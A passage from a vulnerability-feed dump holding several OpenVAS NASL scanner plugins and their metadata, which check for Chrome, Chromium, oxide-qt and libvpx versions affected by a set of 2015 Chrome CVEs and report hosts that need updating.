Google V8.\n\n - Use-after-free vulnerability in the SpeechRecognitionClient implementation\n in the Speech subsystem.\n\n - common/partial_circular_buffer.cc script in Google Chrome does not properly\n handle wraps.\n\n - Vulnerability in core/html/parser/HTMLConstructionSite.cpp in the DOM\n implementation in Blink, as used in Google Chrome.\n\n - Vulnerability in core/dom/Document.cpp in Blink, as used in Google Chrome\n which allows the inheritance of the designMode attribute.\n\n - Use-after-free vulnerability in\n content/renderer/media/webaudio_capturer_source.cc script in the WebAudio\n implementation.\n\n - Use-after-free vulnerability in the SVG implementation in Blink.\n\n - platform/graphics/filters/FEColorMatrix.cpp script in the SVG implementation\n in Blink.\n\n - Google Chrome relies on libvpx code that was not built with an appropriate\n size-limit value.\n\n - PDFium, as used in Google Chrome, does not properly initialize memory.\n\n - Multiple use-after-free vulnerabilities in\n content/renderer/media/user_media_client_impl.cc script in the WebRTC\n implementation.\n\n - Cross-site scripting (XSS) vulnerability in Google Chrome.\n\n - The Spellcheck API implementation in Google Chrome before does not use an\n HTTPS session for downloading a Hunspell dictionary.\n\n - platform/fonts/shaping/HarfBuzzShaper.cpp script in Blink, does not\n initialize a certain width field.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service, inject arbitrary web script, spoof the\n URL bar or deliver misleading popup content, bypass the Same Origin Policy and\n a sandbox protection mechanism, execute arbitrary code and allow\n man-in-the-middle attackers to deliver incorrect spelling suggestions or\n possibly have unspecified other impact via crafted dimensions.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 43.0.2357.65 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 43.0.2357.65 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/05/stable-channel-update_19.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_lin.nasl\");\n script_mandatory_keys(\"Google-Chrome/Linux/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"43.0.2357.65\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 43.0.2357.65' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:13:24", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-05-27T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 02 - May15 (Mac OS X)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-3910", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805632", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805632", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 02 - May15 (Mac OS X)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805632\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\",\n \"CVE-2015-1264\", \"CVE-2015-1265\", \"CVE-2015-3910\");\n script_bugtraq_id(74723);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 09:42:43 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 02 - May15 (Mac OS X)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Multiple unspecified vulnerabilities in Google V8.\n\n - Use-after-free vulnerability in the SpeechRecognitionClient implementation\n in the Speech subsystem.\n\n - common/partial_circular_buffer.cc script in Google Chrome does not properly\n handle wraps.\n\n - Vulnerability in core/html/parser/HTMLConstructionSite.cpp in the DOM\n implementation in Blink, as used in Google Chrome.\n\n - Vulnerability in core/dom/Document.cpp in Blink, as used in Google Chrome\n which allows the inheritance of the designMode attribute.\n\n - Use-after-free vulnerability in\n content/renderer/media/webaudio_capturer_source.cc script in the WebAudio\n implementation.\n\n - Use-after-free vulnerability in the SVG implementation in Blink.\n\n - platform/graphics/filters/FEColorMatrix.cpp script in the SVG implementation\n in Blink.\n\n - Google Chrome relies on libvpx code that was not built with an appropriate\n size-limit value.\n\n - PDFium, as used in Google Chrome, does not properly initialize memory.\n\n - Multiple use-after-free vulnerabilities in\n content/renderer/media/user_media_client_impl.cc script in the WebRTC\n implementation.\n\n - Cross-site scripting (XSS) vulnerability in Google Chrome.\n\n - The Spellcheck API implementation in Google Chrome before does not use an\n HTTPS session for downloading a Hunspell dictionary.\n\n - platform/fonts/shaping/HarfBuzzShaper.cpp script in Blink, does not\n initialize a certain width field.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service, inject arbitrary web script, spoof the\n URL bar or deliver misleading popup content, bypass the Same Origin Policy and\n a sandbox protection mechanism, execute arbitrary code and allow\n man-in-the-middle attackers to deliver incorrect spelling suggestions or\n possibly have unspecified other impact via crafted dimensions.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 43.0.2357.65 on Mac OS X.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 43.0.2357.65 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/05/stable-channel-update_19.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_macosx.nasl\");\n script_mandatory_keys(\"GoogleChrome/MacOSX/Version\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"43.0.2357.65\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 43.0.2357.65' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-19T22:13:24", "description": "The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.", "cvss3": {}, "published": "2015-05-27T00:00:00", "type": "openvas", "title": "Google Chrome Multiple Vulnerabilities - 02 - May15 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1252", "CVE-2015-1256", "CVE-2015-3910", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1264"], "modified": "2019-07-17T00:00:00", "id": "OPENVAS:1361412562310805631", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310805631", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Google Chrome Multiple Vulnerabilities - 02 - May15 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:google:chrome\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805631\");\n script_version(\"2019-07-17T08:15:16+0000\");\n script_cve_id(\"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\",\n \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\",\n \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\",\n \"CVE-2015-1264\", \"CVE-2015-1265\", \"CVE-2015-3910\");\n script_bugtraq_id(74723);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-17 08:15:16 +0000 (Wed, 17 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2015-05-27 09:42:43 +0530 (Wed, 27 May 2015)\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_name(\"Google Chrome Multiple Vulnerabilities - 02 - May15 (Windows)\");\n\n script_tag(name:\"summary\", value:\"The host is installed with Google Chrome\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to:\n\n - Multiple unspecified vulnerabilities in Google V8.\n\n - Use-after-free vulnerability in the SpeechRecognitionClient implementation\n in the Speech subsystem.\n\n - common/partial_circular_buffer.cc script in Google Chrome does not properly\n handle wraps.\n\n - Vulnerability in core/html/parser/HTMLConstructionSite.cpp in the DOM\n implementation in Blink, as used in Google Chrome.\n\n - Vulnerability in core/dom/Document.cpp in Blink, as used in Google Chrome\n which allows the inheritance of the designMode attribute.\n\n - Use-after-free vulnerability in\n content/renderer/media/webaudio_capturer_source.cc script in the WebAudio\n implementation.\n\n - Use-after-free vulnerability in the SVG implementation in Blink.\n\n - platform/graphics/filters/FEColorMatrix.cpp script in the SVG implementation\n in Blink.\n\n - Google Chrome relies on libvpx code that was not built with an appropriate\n size-limit value.\n\n - PDFium, as used in Google Chrome, does not properly initialize memory.\n\n - Multiple use-after-free vulnerabilities in\n content/renderer/media/user_media_client_impl.cc script in the WebRTC\n implementation.\n\n - Cross-site scripting (XSS) vulnerability in Google Chrome.\n\n - The Spellcheck API implementation in Google Chrome before does not use an\n HTTPS session for downloading a Hunspell dictionary.\n\n - platform/fonts/shaping/HarfBuzzShaper.cpp script in Blink, does not\n initialize a certain width field.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to cause a denial of service, inject arbitrary web script, spoof the\n URL bar or deliver misleading popup content, bypass the Same Origin Policy and\n a sandbox protection mechanism, execute arbitrary code and allow\n man-in-the-middle attackers to deliver incorrect spelling suggestions or\n possibly have unspecified other impact via crafted dimensions.\");\n\n script_tag(name:\"affected\", value:\"Google Chrome version prior to\n 43.0.2357.65 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Google Chrome version\n 43.0.2357.65 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://googlechromereleases.blogspot.in/2015/05/stable-channel-update_19.html\");\n\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_dependencies(\"gb_google_chrome_detect_portable_win.nasl\");\n script_mandatory_keys(\"GoogleChrome/Win/Ver\");\n\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!chromeVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:chromeVer, test_version:\"43.0.2357.65\"))\n{\n report = 'Installed version: ' + chromeVer + '\\n' +\n 'Fixed version: 43.0.2357.65' + '\\n';\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:58", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-06-09T00:00:00", "type": "openvas", "title": "Ubuntu Update for oxide-qt USN-2610-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1257", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1256", "CVE-2015-3910", "CVE-2015-1258", "CVE-2015-1255"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310842213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842213", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for oxide-qt USN-2610-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842213\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-09 11:06:47 +0200 (Tue, 09 Jun 2015)\");\n script_cve_id(\"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\",\n \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1260\", \"CVE-2015-1262\",\n \"CVE-2015-1265\", \"CVE-2015-3910\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for oxide-qt USN-2610-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'oxide-qt'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Several security issues were discovered\nin the DOM implementation in Blink. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit these to\nbypass Same Origin Policy restrictions. (CVE-2015-1253, CVE-2015-1254)\n\nA use-after-free was discovered in the WebAudio implementation in\nChromium. If a user were tricked in to opening a specially crafted\nwebsite, an attacker could potentially exploit this to cause a denial of\nservice via renderer crash, or execute arbitrary code with the privileges\nof the sandboxed render process. (CVE-2015-1255)\n\nA use-after-free was discovered in the SVG implementation in Blink. If a\nuser were tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to cause a denial of service via renderer\ncrash, or execute arbitrary code with the privileges of the sandboxed\nrender process. (CVE-2015-1256)\n\nA security issue was discovered in the SVG implementation in Blink. If a\nuser were tricked in to opening a specially crafted website, an attacker\ncould potentially exploit this to cause a denial of service via renderer\ncrash. (CVE-2015-1257)\n\nAn issue was discovered with the build of libvpx. If a user were tricked\nin to opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer crash, or execute\narbitrary code with the privileges of the sandboxed render process.\n(CVE-2015-1258)\n\nMultiple use-after-free issues were discovered in the WebRTC\nimplementation in Chromium. If a user were tricked in to opening a\nspecially crafted website, an attacker could potentially exploit these to\ncause a denial of service via renderer crash, or execute arbitrary code\nwith the privileges of the sandboxed render process. (CVE-2015-1260)\n\nAn uninitialized value bug was discovered in the font shaping code in\nBlink. If a user were tricked in to opening a specially crafted website,\nan attacker could potentially exploit this to cause a denial of service\nvia renderer crash. (CVE-2015-1262)\n\nMultiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service via application crash or execute arbitrary code with the\nprivileges of the user invoking the program. (CVE-2015-1265)\n\nMultiple security issues were discovered in V8. If a user were tricked\nin to opening a specially crafted website, an attacker could potentially\nexploit these to read uninitialized memory, cause a denial of service via\nrenderer crash or execute arbitrary code with the privileges of the\nsandboxed render process. (CVE-2015-3910)\");\n script_tag(name:\"affected\", value:\"oxide-qt on Ubuntu 14.10,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2610-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2610-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:amd64\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:i386\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:amd64\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:i386\", ver:\"1.7.8-0ubuntu0.14.10.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:amd64\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"liboxideqtcore0:i386\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:i386\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs:amd64\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:amd64\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"oxideqt-codecs-extra:i386\", ver:\"1.7.8-0ubuntu0.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:11", "description": "Gentoo Linux Local Security Checks GLSA 201506-04", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201506-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1265", "CVE-2015-1247", "CVE-2015-1257", "CVE-2015-1246", "CVE-2015-1244", "CVE-2015-1263", "CVE-2015-1251", "CVE-2015-1262", "CVE-2015-1260", "CVE-2015-1240", "CVE-2015-1241", "CVE-2015-1250", "CVE-2015-1253", "CVE-2015-1254", "CVE-2015-1259", "CVE-2015-1243", "CVE-2015-1252", "CVE-2015-1233", "CVE-2015-1248", "CVE-2015-1236", "CVE-2015-1256", "CVE-2015-1242", "CVE-2015-1245", "CVE-2015-1235", "CVE-2015-1237", "CVE-2015-1258", "CVE-2015-1255", "CVE-2015-1238", "CVE-2015-1264", "CVE-2015-1234"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121381", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121381", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201506-04.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121381\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:51 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201506-04\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Chromium. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201506-04\");\n script_cve_id(\"CVE-2015-1233\", \"CVE-2015-1234\", \"CVE-2015-1235\", \"CVE-2015-1236\", \"CVE-2015-1237\", \"CVE-2015-1238\", \"CVE-2015-1240\", \"CVE-2015-1241\", \"CVE-2015-1242\", \"CVE-2015-1243\", \"CVE-2015-1244\", \"CVE-2015-1245\", \"CVE-2015-1246\", \"CVE-2015-1247\", \"CVE-2015-1248\", \"CVE-2015-1250\", \"CVE-2015-1251\", \"CVE-2015-1252\", \"CVE-2015-1253\", \"CVE-2015-1254\", \"CVE-2015-1255\", \"CVE-2015-1256\", \"CVE-2015-1257\", \"CVE-2015-1258\", \"CVE-2015-1259\", \"CVE-2015-1260\", \"CVE-2015-1262\", \"CVE-2015-1263\", \"CVE-2015-1264\", \"CVE-2015-1265\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201506-04\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-client/chromium\", unaffected: make_list(\"ge 43.0.2357.65\"), vulnerable: make_list(\"lt 43.0.2357.65\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2015-09-25T00:00:00", "type": "openvas", "title": "Fedora Update for libvpx FEDORA-2015-15936", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1258"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310869961", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869961", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for libvpx FEDORA-2015-15936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869961\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-09-25 07:18:19 +0200 (Fri, 25 Sep 2015)\");\n script_cve_id(\"CVE-2015-1258\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for libvpx FEDORA-2015-15936\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libvpx'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"libvpx on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-15936\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-September/167428.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = 